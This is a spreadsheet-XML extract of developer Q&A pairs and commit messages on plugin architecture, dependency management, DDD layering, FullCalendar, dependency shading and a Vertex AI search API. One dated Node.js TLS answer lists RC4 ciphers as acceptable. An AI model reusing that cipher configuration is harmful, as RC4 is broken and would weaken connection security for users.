    <t xml:space="preserve">I divided my problem into a short and a long version for the people with little time at hand.
Short version:
I need some architecture for a system with provider and consumer plugins.
Providers should implement interface IProvider and consumers should implement IConsumer. The executing application should only be aware of IProvider and IConsumer. A consumer implementation can ask the executing assembly (using a ServiceProcessor) which providers implement InterfaceX and gets a List back. These IProvider objects should be cast to InterfaceX (in the consumer) to be able to hook the consumer onto some events InterfaceX defines. This will fail because the executing assembly somehow doesn't know this InterfaceX type (cast fails). The solution would be to include InterfaceX into some assembly that both the plugins and the executing assembly reference, but this should mean a recompile for every new provider/consumer pair and is highly undesirable.
Any suggestions?
Long version:
I'm developing some sort of generic service that will use plugins to achieve a higher level of re-usability. The service consists of some sort of Observer pattern implementation using Providers and Consumers. Both providers and Consumers should be plugins for the main application. First, let me explain how the service works by listing the projects I have in my solution.
Project A: A Windows Service project for hosting all plugins and basic functionality. A TestGUI Windows Forms project is used for easier debugging. An instance of the ServiceProcessor class from Project B is doing the plugin-related stuff. The subfolders "Consumers" and "Providers" of this project contain subfolders where every subfolder holds a consumer or provider plugin assembly respectively.
Project B: A Class library holding the ServiceProcessor class (that does all plugin loading and dispatching between plugins, etc), IConsumer, and IProvider.
Project C: A Class library, linked to Project B, consisting of TestConsumer (implementing IConsumer) and TestProvider (implementing IProvider). An additional interface (ITest, itself derived from IProvider) is implemented by the TestProvider.
The goal here is that a Consumer plugin can ask the ServiceProcessor which Providers (implementing at least IProvider) it has). The returned IProvider objects should be casted to the other interface it implements (ITest) in the IConsumer implementation so that the consumer can hook event handlers to the ITest events.
When project A starts, the subfolders containing the consumer and provider plugins are loaded. Below are some problems I've encountered so far and tried to solve.
The interface ITest used to reside in Project C since this only applies to methods and events TestProvider and TestConsumer are aware of. The general idea is to keep Project A simple and unaware of what the plugins do with each other.
With ITest in project C there and code in the Initialize method of the TestConsumer that casts the IProvider to ITest (this should not fail in a single class library itself when an object implementing ITest is known as an IConsumer object) an invalid casting error would occur. This error can be solved by placing the ITest interface into project B which is referenced by project A as well. It is highly unwanted though since we need to recompile project A when a new interface is built.
I tried to put ITest in a single class library referenced by Project C only since only the provider and consumer need to be aware of this interface, but with no success: when loading the plugin, the CLR states the referenced project could not be found. This could be solved by hooking on the AssemblyResolve event of the current AppDomain but somehow this seems unwanted as well. ITest went back to Project B again.
I tried to split Project C into a separate project for the consumer and provider and both load the assemblies which itself works well: both assemblies are resident in the Assemblies collection or the current AppDomain:
Assembly found: Datamex.Projects.Polaris.Testing.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=2813de212e2efcd3
Assembly found: Datamex.Projects.Polaris.Testing.Consumers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ea5901de8cdcb258
Since the Consumer uses the Provider a reference was made from the Consumer to the Provider. Now the AssemblyResolve event fired again stating it needs the following file:
AssemblyName=Datamex.Projects.Polaris.Testing.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=2813de212e2efcd3
My questions:
Why is this? This file is already loaded, right?
Why is the cast from IProvider to some interface I know it implements impossible? This is probably because the executing program itself doesn't know this interface, but can't this be loaded dynamically?
My ultimate goal:
Consumer plugins ask the ServiceProcessor which Providers it has that do implement Interface x. The providers can be casted to this interface x, without executing assembly being aware of interface x.
Somebody that can help?
Thanks in advance
</t>
  </si>
  <si>
    <t>C877</t>
  </si>
  <si>
    <t>Reevaluate production vs. peer/dev dependencies 
Of course! Glad to dig into it. I will keep digging for other solutions too. Noting here that while I stumbled upon this package separately (typing 'peer dependency' into Github, out of curiosity), I stumbled upon another StackExchange answer this morning that described the same approach and linked to that package. https://softwareengineering.stackexchange.com/a/273576</t>
  </si>
  <si>
    <t>The [codependency module](https://www.npmjs.com/package/codependency) may be what you're looking for, or anything that does something similar to:
* declare optional dependencies in `package.json` that **aren't** automatically installed by `npm install`, say `optionalPeerDependencies`
* a custom `require`-style function that knows about `optionalPeerDependencies` and does the right thing, including throwing/warning when nothing is found that fulfills a required class of modules (e.g. neither `redis`, nor `mongo`, nor `mysql`, etc. are installed).
* document the expectation that consumers of this module install at least 1 of the optional peer modules
One variation would be if the module's core functionality works without any optional dependencies (e.g. plugin pattern), no error/warning when nothing is found that fulfills a peer dependency.
Another variation is doing the list above while accounting for production versus development dependencies, i.e. an analog for `dependencies` and `devDependencies`.
Perhaps combined with an [on-demand require](https://stackoverflow.com/questions/12138983/on-demand-require) such that optional modules are required lazily, e.g.:
    exports = {
        Core : require('./core'),
        get redis(){ return require('./redis'); },
        get mongo(){ return require('./mongo'); }
    }</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to do something like this in my Blade pages:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;accordion-content&amp;quot;&amp;gt;
    @mdsnippet('snippets/common/some-content-for-multiple-pages.md')
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then _snippets/common/some-content-for-multiple-pages.md contains:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;## here's some content
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which Hyde writes out to the output directory as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class=&amp;quot;accordion-content&amp;quot;&amp;gt;
    &amp;lt;h2&amp;gt;here's some content&amp;lt;/h2&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible? It looks like we can add Blade in Markdown files:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hydephp.com/docs/1.x/advanced-markdown" rel="nofollow noreferrer"&gt;https://hydephp.com/docs/1.x/advanced-markdown&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;But I'm wanting to do the reverse - Markdown in Blade files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C878</t>
  </si>
  <si>
    <t>Hide the daos behind a service layer, empty for now but this protects
 the applications from changes to the database etc. See also http://softwareengineering.stackexchange.com/questions/220909/service-layer-vs-dao-why-both</t>
  </si>
  <si>
    <t>Generally the DAO is as light as possible and exists solely to provide a connection to the DB, sometimes abstracted so different DB backends can be used.
The service layer is there to provide logic to operate on the data sent to and from the DAO and the client. Very often these 2 pieces will be bundled together into the same module, and occasionally into the same code, but you'll still see them as distinct logical entities.
Another reason is security - If you provide a service layer that has no relation to the DB, then is it more difficult to gain access to the DB from the client except through the service. If the DB cannot be accessed directly from the client (and there is no trivial DAO module acting as the service) then all an attacker who has taken over the client can do is attempt to hack the service layer as well before he gets all but the most sanitised access to your data.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a three-tier architecture consisting of Classic ASP Frontend, VB COM+ Objects and MSSql Database.
We are going to replace the VB COM by ASP.NET Webservice layer soon but we are not in the position to replace the Classic ASP with new .NET code (yet) and we're therefore going to need a way to consume webservices in Classic ASP...
We know it's possible but unsure what the best way is to do this...
Can we return VBScript RecordSets in a webservice call? (All of our Classic ASP Frontend uses Recordsets at the moment). If not what would the easiest way to use consume the results?
Are there any libraries / classes that make it easier?
All advice, links, code examples and comments are welcome!
</t>
  </si>
  <si>
    <t>C879</t>
  </si>
  <si>
    <t>chore new structure of project
This commit is first concerned global project structure. So it is test.
Created main app development design concept.
This concept based on DDD (Domain Driven Design) approach.
Project folder tree is next:
1. application layer
    - app (or application services)
    - data (or repositories)
2. domain layer
    - domain
3. infrastucture layer
    - libs
For get more details about this planned design in:
https://emacsway.github.io/ru/service-layer/
https://softwareengineering.stackexchange.com/questions/396151/which-layer-do-ddd-repositories-belong-to</t>
  </si>
  <si>
    <t>Repositories and their placement in the code structure is a matter of intense debate in DDD circles. It is also a matter of preference, and often a decision taken based on the specific abilities of your framework and ORM.
The issue is also muddied when you consider other design philosophies like Clean Architecture, which advocate using an abstract repository in the domain layer while providing concrete implementations in the infrastructure layer.
But here's what I have discovered, and what has worked for me, after trying out different permutation/combinations.
From a DDD perspective, Repositories sit between Application Services and Domain Objects.
Domain Objects encapsulate behavior and contain the bulk of business logic, enforcing invariants at the aggregate level.
Application services receive calls from UI/API/Controllers/Channels (external facing), initial repositories to load aggregates (if needed), invoke domain model for the necessary changes, then use the repositories again to persist aggregates
To your questions:
Which layer Repositories belong: the Domain Layer, Persistence Layer or something in the middle?
I would say there are three distinct layers in DDD applications - the inner domain layer, the outer application layer, and the external world (includes the API/UI).
The domain layer contains aggregates, entities, value objects, domain services, and domain events. These elements are only dependent on each other and actively avoid dependencies any outer layers.
The application layer contains Application Services, Repositories, Message Brokers, and whatever else you need to make your application practically possible. This layer is where most of the persistence, authorization, pub-sub processing, etc. happens. Application Layer depends and knows about the domain layer elements, but follows DDD guidelines when accessing the domain model. For example, it will only invoke methods on Aggregates and Domain Services.
The outermost layer includes API Controllers, serializers, authentication, logging, etc., whatever is not related to business logic or your domain, but very much part of your application.
Can Entities, Value Objects or Domain Services call Repositories?
No. The domain layer should preferably remain agnostic to repositories. Application services should take on the responsibility of transactions and repository interactions.
Should Repositories be abstracted from storage technology (which would be implied if they belong to domain layer) or can they leverage those storage technologies?
Repositories lean towards the domain side, meaning they contain methods that are meaningful from a domain point of view (like
GetAdults()
or
GetMinors()
). But the concrete implementation can be done in a couple of ways:
You could use an abstract repository to declare the necessary methods, and then create concrete implementations for different databases. The database implementation can be chosen at the beginning of application startup, based on your configurations. Note that even in this case, Domain layer has nothing to do with repositories
Repositories could act like wrappers and make use of underlying DAO objects (one per table/document) that implement the actual logic for interacting with the database. The DAO objects are initialized usually with dependency injection if your framework/language supports it, or they could be initialized manually based on active configuration.
Can Repositories contain business logic?
Repositories represent domain concepts, with meaningful method names, but seldom contain any business logic. They encapsulate the database query and give it a conceptual name that usually is derived directly from the ubiquitous language. It is so much better to have a method called
GetAdults()
instead of
.filter(age &gt; 21)
.
Have you applied these constraints in practice and what was the effect on the quality of your project?
If you restrict yourself to using repositories only in application services, and control transactions at one place (usually with Unit of Work pattern), Repositories are pretty easy to work with. In my past projects, I have found it extremely useful to restrict all database interaction to repositories instead of sprinkling lifecycle methods in the domain layer.
When I called lifecycle methods (like
save
,
update
, etc.) from the aggregate layer, I found it to be extremely complex and difficult to reliably control ACID transactions.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using full calendar and I want to make it so that when the user drags an event to the calendar, depending on the area in which they are dragging the event, the column changes its color to green or red (the green columns are where the event can be dropped and the red ones where it cannot). I have tried various full calendar functions, however none of them have worked for me, the closest I come is to releasing the event and when moving it a second time the colors of the columns change. I tried using &amp;quot;eventDragStart&amp;quot;, however what I mentioned above happens - it works once the event is in the calendar and not before. What I would like to know is if there is any possibility of creating a function that changes the colors of the calendar when dragging the event, so I could leave my code like this and in addition I could also see the allowed and not allowed places in real time since I dragged the event with this new function, I have tried it but it has not worked for me.
Event division is different from calendar division.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;eventDragStart: function (info) {
        if (info.event.title === &amp;quot;allowed example&amp;quot;) {
          document.querySelectorAll('td.fc-timegrid-col[data-resource-id]').forEach(cell =&amp;gt; {
            const recursoId = cell.getAttribute('data-resource-id');
            console.log(&amp;quot;ID encontrado:&amp;quot;, recursoId);
            if (recursoId === &amp;quot;1&amp;quot; || recursoId === &amp;quot;3&amp;quot;) {
              cell.style.backgroundColor = 'lightgreen';
            } else {
              cell.style.backgroundColor = 'lightcoral';
            }
          });
        }
      },
function configureDragEvents() {
  const events = document.querySelectorAll(&amp;quot;.fc-event&amp;quot;);
  const calendarEl = document.getElementById(&amp;quot;calendar&amp;quot;);
  eventos.forEach(evento =&amp;gt; {
    evento.setAttribute(&amp;quot;draggable&amp;quot;, &amp;quot;true&amp;quot;);
    evento.addEventListener(&amp;quot;dragstart&amp;quot;, function () {
      console.log(&amp;quot;drag start&amp;quot;);
      iluminarColumnas(true);
    });
    evento.addEventListener(&amp;quot;dragend&amp;quot;, function () {
      console.log(&amp;quot;drag end&amp;quot;);
      iluminarColumnas(false);
    });
  });
  document.addEventListener(&amp;quot;dragover&amp;quot;, function (e) {
    if (e.target.closest(&amp;quot;#calendar&amp;quot;)) {
      console.log(&amp;quot;drag over&amp;quot;);
      iluminarColumnas(true);
    }
  });
  document.addEventListener(&amp;quot;dragleave&amp;quot;, function (e) {
    if (!e.relatedTarget || !e.relatedTarget.closest(&amp;quot;#calendar&amp;quot;)) {
      console.log(&amp;quot;drag leave&amp;quot;);
      iluminarColumnas(false);
    }
  });
  function iluminarColumnas(activar) {
    document.querySelectorAll('td.fc-timegri`your text`d-col[data-resource-id]').forEach(cell =&amp;gt; {
      const recursoId = cell.getAttribute('data-resource-id');
      if (recursoId === &amp;quot;1&amp;quot; || recursoId === &amp;quot;3&amp;quot;) {
        cell.style.backgroundColor = activar ? 'lightgreen' : '';
      }
    });
  }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C88</t>
  </si>
  <si>
    <t>To add tls 1.2 support.
http://stackoverflow.com/questions/13434679/node-js-tls1-2-and-authentication
Change-Id: I4b947c80162dd6db657d8cee3a54e13b92d93ace</t>
  </si>
  <si>
    <t>Creating a https listener is easy but it's not clear whether you have specific issues creating one with TLS 1.2. Recent node builds against a new enough version of OpenSSL to pick up their 1.2 support.
Then you need both the ciphers and honorCipherOrder options as described here:
http://nodejs.org/api/tls.html
e.g
var https = require('https');
var fs = require('fs');
var options = {
    key: fs.readFileSync('my.key'),
    cert: fs.readFileSync('my.crt'),
    ciphers: 'ECDHE-RSA-AES256-SHA:AES256-SHA:RC4-SHA:RC4:HIGH:!MD5:!aNULL:!EDH:!AESGCM',
    honorCipherOrder: true
};
var server = https.createServer(options, function (req, res) {
    ...});
server.listen(443);</t>
  </si>
  <si>
    <t xml:space="preserve">Does adding a Web Service to my ASP.NET MVC project break the whole concept of MVC?
That Web Service (WCF) depends on the Model layer from my MVC project to communicate with the back-end (so it looks to me like it needs to be part of the MVC solution).
Should I add this to the Controller or Model layer?
</t>
  </si>
  <si>
    <t>C880</t>
  </si>
  <si>
    <t>Support pulling dependencies
Implement a method that allows the attraction of dependencies through a search strategy.
With dependency lookup, a component must look up the reference to a dependency.
Reference:
https://softwareengineering.stackexchange.com/questions/279500/dependency-injection-vs-dependency-lookup-in-a-layered-architecture</t>
  </si>
  <si>
    <t>You're going for something akin to (but not similar) Spring's
ApplicationContextAware
, where you pass ApplicationContext (which is a BeanFactory) via a setter, so it later can get beans it needs.
Generally it is a bad idea, if you only need to inject dependencies:
It is not explicit about dependencies it uses. So, it is actually
harder
to mock, not easier, because you're not sure what needs to be mocked unless you look into the
whole code
of a class and probably the
whole code
of its' super- and subclasses, if inheritance happens.
It is not type safe if you query dependencies by string keys, with all negative consequences of that. However, if you say you'll have specific interfaces to deal with that (like
UserRepositoryFactory
which has a method like
getUserRepository
, I guess), it will be type safe, but I don't see the benefit in this solution, because it seems much easier to just inject dependencies without medium getter/wrapper/injector-objects. I think it would be just duplication of DI functionality.
If I would make a plugin system, I would go with "stupid" plugins, which just implement some
SomethingPlugin
interface, and expect it's dependencies to be injected (via constructor or setters, which doesn't really matter) by the system, without any prior knowledge of anything outside.
Example:
public class UserRatingPlugin implements GenericPlugin,
        UserRepositoryAwarePlugin, PostResositoryAwarePlugin {
    // here are dependencies
    private UserRepository userRepository;
    private PostRepository postRepository
    @Override // from UserRepositoryAwarePlugin
    public void setUserRepository(UserRepository ur) {
        userRepository = ur;
    }
    @Override // from PostResositoryAwarePlugin
    public void setPostRepository(PostRepository pr) {
        postRepository = pr;
    }
    @Override // from GenericPlugin
    // this should be required to make this class a plugin
    public void doPluginMagic() { /* ... */ }
}
Then you register this plugin (via config file, I imagine), then somewhere in a "system level" code you instantiate this class, set dependencies (this part can be automated by Spring's or similar DI-container) and invoke
doPluginMagic()
.
This way you still have small specific interfaces, but now as parts of a plugin API, which I think simplifies the whole thing. You can see what plugin can access by just looking on its' type declaration, and no additional "factories" have to be crafted.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking to create a fairly large-scale ASP.NET MVC project and I want to break it out so that it's not all in one project and one assembly.
I looked at how Oxite does their organization ([external-link]) but I was wondering how other people do it too. Any suggestions?
Currently, I'm considering something very similiar to Oxite:
Project - This project contains the model layer which includes models, configuration classes, and interfaces for services and repositories. There should not be much application logic here, mostly data structures.
Project.Core - This project contains all the code for controller and routing including filters and results. Also included in here is ViewData model.
Project.Site - This project contains the Views, images, javascript and all other static non-code files. There should be minimal C# code here, the majority should live in Project.Core
</t>
  </si>
  <si>
    <t>C881</t>
  </si>
  <si>
    <t xml:space="preserve">Overview
There are cases where library authors need to add a dependency on NuGet packages, but without having consumers of their library (and not the dependency as well) to automatically have access to those APIs unless explicitly referenced.
The main idea is: some dependency should only be viewed as implementation details for a library.
This is due to a number of reasons:
These APIs might not conceptually make sense to be exposed together with a library. As an example, I'm working on ComputeSharp, which is a high-level, easy to use library to do GPU processing in C#. This library has a dependency on TerraFX.Interop.Windows, which provides extremely low-level bindings for Windows APIs. I don't want consumers of my library to also have TerraFX APIs pop up in their IntelliSense. These APIs are just an implementation detail for me, and conceptually they have nothing to do with what ComputeSharp aims to be - a high-level and accessible library.
Having these APIs being exposed caused a potentially breaking dependency for consumers. Consider the case for ComputeSharp as before. If one day I wanted to change my backend for whatever reasons, and some consumers were using APIs from TerraFX as well, updating ComputeSharp would be a breaking change, even if I'd only be changing an internal implementation detail, and nothing on my public API surface.
Point 1. is the one I care about in particular. That's the same reason why me and many other library authors take special care in trimming the public API surface as much as possible to keep it clean - having every single indirect API being automatically visible to consumers completely undermines this, especially when these APIs are very different from the design of the library itself.
Proposed solution
This proposal is to add a new property that can be added to PackageReference items (eg. PubliclyVisible, defaulting to true for backwards compatibility) that when set to false would cause the following behavior:
Overview
There are cases where library authors need to add a dependency on NuGet packages, but without having consumers of their library (and not the dependency as well) to automatically have access to those APIs unless explicitly referenced.
The main idea is: some dependency should only be viewed as implementation details for a library.
This is due to a number of reasons:
These APIs might not conceptually make sense to be exposed together with a library. As an example, I'm working on ComputeSharp, which is a high-level, easy to use library to do GPU processing in C#. This library has a dependency on TerraFX.Interop.Windows, which provides extremely low-level bindings for Windows APIs. I don't want consumers of my library to also have TerraFX APIs pop up in their IntelliSense. These APIs are just an implementation detail for me, and conceptually they have nothing to do with what ComputeSharp aims to be - a high-level and accessible library.
Having these APIs being exposed caused a potentially breaking dependency for consumers. Consider the case for ComputeSharp as before. If one day I wanted to change my backend for whatever reasons, and some consumers were using APIs from TerraFX as well, updating ComputeSharp would be a breaking change, even if I'd only be changing an internal implementation detail, and nothing on my public API surface.
Point 1. is the one I care about in particular. That's the same reason why me and many other library authors take special care in trimming the public API surface as much as possible to keep it clean - having every single indirect API being automatically visible to consumers completely undermines this, especially when these APIs are very different from the design of the library itself.
Proposed solution
This proposal is to add a new property that can be added to PackageReference items (eg. PubliclyVisible, defaulting to true for backwards compatibility) that when set to false would cause the following behavior:
APIs from these dependencies would not be visible for consumers. As in, trying to use them would fail to build.
Consumers would need to manually add a dependency to that package in their own project to see/use them.
These dependencies would still be visible when installing the NuGet package, as is today
APIs from these dependencies would not be visible for consumers. As in, trying to use them would fail to build.
Consumers would need to manually add a dependency to that package in their own project to see/use them.
These dependencies would still be visible when installing the NuGet package, as is today
Proposal: option to hide dependency APIs if consumers don't reference them too.
In JAVA world it's called "Class Shadowing" https://softwareengineering.stackexchange.com/questions/297276/what-is-a-shaded-java-dependency </t>
  </si>
  <si>
    <t>Shading dependencies
is the process of
including and renaming dependencies
(thus relocating the classes &amp; rewriting affected bytecode &amp; resources) to
create a private copy that you bundle alongside your own code
.
The concept is usually associated with
uber-jars
(aka
fat jars
).
There is some
confusion about the term
, because of maven shade plugin, which under that single name does
2 things
(quoting their own page):
This plugin provides the capability to package the artifact in an uber-jar, including its dependencies and to
shade
- i.e. rename - the packages of some of the dependencies.
So
the shading part is actually optional: the plugin allows to include dependencies in your jar (fat jar), and optionally rename (shade) dependencies
.
Adding
another source
:
To Shade a library is to take the contents files of said library, put them in your own jar,
and change their package
. This is different from packaging which is simply shipping the libraries files in side your own jar without relocating them to a different package.
Technically speaking,
dependencies
are shaded. But it's common to refer to a fat-jar-with-shaded-dependencies as "shaded jar", and if that jar is a client for another system, it can be referred to as "shaded client".
Here is the
title
of the Jira issue for HBase that you linked in your question:
Publish a client artifact with shaded dependencies
So in this post I'm trying to present the 2 concepts without conflating them.
The Good
Uber-jars are often used to ship an application as a single file (makes it easy to deploy and run). They can also be used to ship libraries along with some (or all) of their dependencies
shaded
, in order to avoid conflicts when used by other applications (which might use different versions of those libraries).
There are several ways to build uber-jars, but
maven-shade-plugin
goes one step further with its
class relocation
feature:
If the uber JAR is reused as a dependency of some other project, directly including classes from the artifact's dependencies in the uber JAR can cause class loading conflicts due to duplicate classes on the class path. To address this issue, one can relocate the classes which get included in the shaded artifact in order to create a private copy of their bytecode.
(Historical note:
Jar Jar Links
offered that relocation feature before)
So with this you can
make your library dependencies an implementation detail
, unless you expose classes from those libraries in your API.
Let's say I have a project, ACME Quantanizer™, which provides
DecayingSyncQuantanizer
class, and depends on Apache commons-rng (because
of course
to properly quantanize you need a
XorShift1024Star
, duh).
If I use the shade maven plugin to produce a uber-jar, and I look inside, I see these class files:
com/acme/DecayingSyncQuantanizer.class
org/apache/commons/rng/RandomProviderState.class
org/apache/commons/rng/RestorableUniformRandomProvider.class
...
org/apache/commons/rng/core/source64/XorShift1024Star.class
org/apache/commons/rng/core/util/NumberFactory.class
Now if I use the class-relocating feature:
&lt;plugin&gt;
  &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;
  &lt;artifactId&gt;maven-shade-plugin&lt;/artifactId&gt;
  &lt;version&gt;3.0.0&lt;/version&gt;
  &lt;executions&gt;
    &lt;execution&gt;
      &lt;phase&gt;package&lt;/phase&gt;
      &lt;goals&gt;
        &lt;goal&gt;shade&lt;/goal&gt;
      &lt;/goals&gt;
      &lt;configuration&gt;
        &lt;relocations&gt;
          &lt;relocation&gt;
            &lt;pattern&gt;org.apache.commons&lt;/pattern&gt;
            &lt;shadedPattern&gt;com.acme.shaded.apachecommons&lt;/shadedPattern&gt;
          &lt;/relocation&gt;
        &lt;/relocations&gt;
      &lt;/configuration&gt;
    &lt;/execution&gt;
  &lt;/executions&gt;
&lt;/plugin&gt;
The content of uber-jar looks like this:
com/acme/DecayingSyncQuantanizer.class
com/acme/shaded/apachecommons/rng/RandomProviderState.class
com/acme/shaded/apachecommons/rng/RestorableUniformRandomProvider.class
...
com/acme/shaded/apachecommons/rng/core/source64/XorShift1024Star.class
com/acme/shaded/apachecommons/rng/core/util/NumberFactory.class
It's not just renaming files, it
rewrites bytecode that references relocated classes
(so, my own classes &amp; commons-rng classes are all transformed).
In addition, Shade plugin will also generate a new POM (
dependency-reduced-pom.xml
) wherein shaded dependencies are removed from the
&lt;dependencies&gt;
section. This helps use the shaded jar as a dependency for another project. So you can publish that jar instead of the base one,
or both
(using a qualifier for the shaded jar).
So that can be very useful...
The Bad
...but it also poses a number of issues. Aggregating all dependencies into a single "namespace" within the jar can get messy, and require shading &amp; messing with resources.
For example: how to deal with resource files that include class or package names? Resource files such as service provider descriptors which all live under
META-INF/services
?
The shade plugin offers
resource transformers
that can help with that:
Aggregating classes/resources from several artifacts into one uber JAR is straight forward as long as there is no overlap. Otherwise, some kind of logic to merge resources from several JARs is required. This is where
resource transformers
kick in.
But it's still messy, and the problems are almost impossible to anticipate (quite often you discover the issues the hard way in production). See
why-we-stopped-building-fat-jars
.
All in all, deploying a fat jar as a standalone app/service is still very common, you just need to be aware of the gotchas, and for some of those you might need
shading
or other tricks.
The Ugly
There are many more difficult issues (debugging, testability, compatibility with OSGi &amp; exotic classloaders...).
But more importantly, when you produce a library, the various issues that you thought you could control are now getting infinitely more complicated, because your jar will be used in many different contexts (unlike a fat jar that you deploy as a standalone app/service in a controlled environment).
For example, ElasticSearch used to shade some dependencies in the jars they shipped, but
they decided to stop doing that
:
Before version 2.0, Elasticsearch was provided as a JAR with some (but not all) common dependencies shaded and packaged within the same artifact. This helped Java users who embed Elasticsearch in their own applications to avoid version conflicts of modules like Guava, Joda, Jackson, etc. Of course, there was still a list of other unshaded dependencies like Lucene that could still cause conflicts.
Unfortunately, shading is a complex and error prone process which solved problems for some people while creating problems for others. Shading makes it very difficult for developers and plugin authors to write and debug code properly because packages are renamed during the build. Finally, we used to test Elasticsearch unshaded then ship the shaded jar, and we don’t like to ship anything that we aren’t testing.
We have decided to ship Elasticsearch without shading from 2.0 onwards.
Please note they too refer to
shaded dependencies
, not
shaded jar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using the Vertex AI Website Search using DiscoveryEngine API.
But the API was not returning the correct value for some keywords.
So we upgrade the API DataStore to Advanced search. With this we are able to fix the keywords that was not returning the correct value, but the new response from the API is missing some values. I have attached old and new response.&lt;/p&gt;
&lt;p&gt;This the the Code below that i am using to get the search result.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const apiKey = &amp;quot;Replace with your API key&amp;quot;;
const searchEngineUrl = &amp;quot;https://discoveryengine.googleapis.com/v1/projects/22815615789/locations/global/collections/default_collection/engines/vertexaisearch_1736347885656/servingConfigs/default_search:searchLite&amp;quot;;
function performSearch(query, start, isAutocomplete) {
    const requestData = {
        query: query,
        pageSize: 10,
        offset: start,
        queryExpansionSpec: {
            condition: &amp;quot;AUTO&amp;quot;
        },
        spellCorrectionSpec: {
            mode: &amp;quot;AUTO&amp;quot;
        },
        contentSearchSpec: {
            snippetSpec: {
                returnSnippet: true
            }
        }
    };
    $.ajax({
        url: `${searchEngineUrl}?key=${apiKey}`,
        type: &amp;quot;POST&amp;quot;,
        contentType: &amp;quot;application/json&amp;quot;,
        data: JSON.stringify(requestData),
        success: function (response) {
            console.log(response);            
        },
        error: function (xhr, status, error) {
            console.error(&amp;quot;Error occurred:&amp;quot;, error);
            $(&amp;quot;#results&amp;quot;).html(&amp;quot;&amp;lt;p&amp;gt;Something went wrong. Please try again.&amp;lt;/p&amp;gt;&amp;quot;);
        }
    });    
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;New response after Upgrading to advance&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;results&amp;quot;: [
    {
      &amp;quot;id&amp;quot;: &amp;quot;c410346e673451988709877632fad077&amp;quot;,
      &amp;quot;document&amp;quot;: {
        &amp;quot;name&amp;quot;: &amp;quot;projects/22815615789/locations/global/collections/default_collection/dataStores/vertexaisearchdatastore_1736347885656/branches/0/documents/c410346e673451988709877632fad077&amp;quot;,
        &amp;quot;id&amp;quot;: &amp;quot;c410346e673451988709877632fad077&amp;quot;,
        &amp;quot;derivedStructData&amp;quot;: {
          &amp;quot;link&amp;quot;: &amp;quot;[productPageURL]&amp;quot;,
          &amp;quot;snippets&amp;quot;: [
            {
              &amp;quot;snippet&amp;quot;: &amp;quot;A quality alternative refrigerator water filter for RF23M8580SG/SA Samsung French Door refrigerators made by SpiroPure. A certified replacement filter!&amp;quot;,
              &amp;quot;snippet_status&amp;quot;: &amp;quot;SUCCESS&amp;quot;
            }
          ],
          &amp;quot;displayLink&amp;quot;: &amp;quot;[siteUrl]&amp;quot;,
          &amp;quot;title&amp;quot;: &amp;quot;Samsung RF23M8580SG/SA Water Filter Replacement - $12.95!&amp;quot;,
          &amp;quot;htmlTitle&amp;quot;: &amp;quot;Samsung RF23M8580SG/&amp;lt;b&amp;gt;SA&amp;lt;/b&amp;gt; Water Filter Replacement - $12.95!&amp;quot;
        }
      }
    }
  ],
  &amp;quot;totalSize&amp;quot;: 1,
  &amp;quot;attributionToken&amp;quot;: &amp;quot;xgHwxQoMCJff_bsGEOHmuM0CEiQ2YWJkZjA1OS0wMDAwLTI4MmEtOGZiYy0zYzI4NmQzZDZkMmEiB0dFTkVSSUMqhAGc1rctxPzLMOndxDD59rMtkPeyMVrw4GDGy_MXrfizLY6RyTCuxIot24-aIqOJsy3O5rUvxMaxMI2ktDDMndswoImzLdHmtS-rxIot3o-aIpWSxTC9C3eT_PazLZ_Wty3C8J4VkKS0MLe3jC3m3cQwwfzLMMfGsTDUsp0Vo4CXIqr4sy0wAQ&amp;quot;,
  &amp;quot;nextPageToken&amp;quot;: &amp;quot;EmMkZDZzQmN4IzYz0rGeRTGOtEmM4ITLwADMw0CO1AjZkJRCGWtGDILs5mIEGwbjIfJCMIBMxIgC&amp;quot;,
  &amp;quot;summary&amp;quot;: { &amp;quot;summarySkippedReasons&amp;quot;: [ &amp;quot;LLM_ADDON_NOT_ENABLED&amp;quot; ] },
  &amp;quot;queryExpansionInfo&amp;quot;: {}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Old response before Upgrading to advance&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;results&amp;quot;: [
    {
      &amp;quot;id&amp;quot;: &amp;quot;0&amp;quot;,
      &amp;quot;document&amp;quot;: {
        &amp;quot;name&amp;quot;: &amp;quot;projects/22815615789/locations/global/collections/default_collection/dataStores/vertexaisearchdatastore_1736347885656/branches/0/documents/0&amp;quot;,
        &amp;quot;id&amp;quot;: &amp;quot;0&amp;quot;,
        &amp;quot;derivedStructData&amp;quot;: {
          &amp;quot;link&amp;quot;: &amp;quot;[productPageURL]&amp;quot;,
          &amp;quot;formattedUrl&amp;quot;: &amp;quot;[productPageURL]&amp;quot;,
          &amp;quot;htmlFormattedUrl&amp;quot;: &amp;quot;[productPageURL]&amp;quot;,
          &amp;quot;displayLink&amp;quot;: &amp;quot;[siteUrl]&amp;quot;,
          &amp;quot;htmlTitle&amp;quot;: &amp;quot;Samsung RF23M8580SG/&amp;lt;b&amp;gt;SA&amp;lt;/b&amp;gt; Water Filter Replacement - $12.95!&amp;quot;,
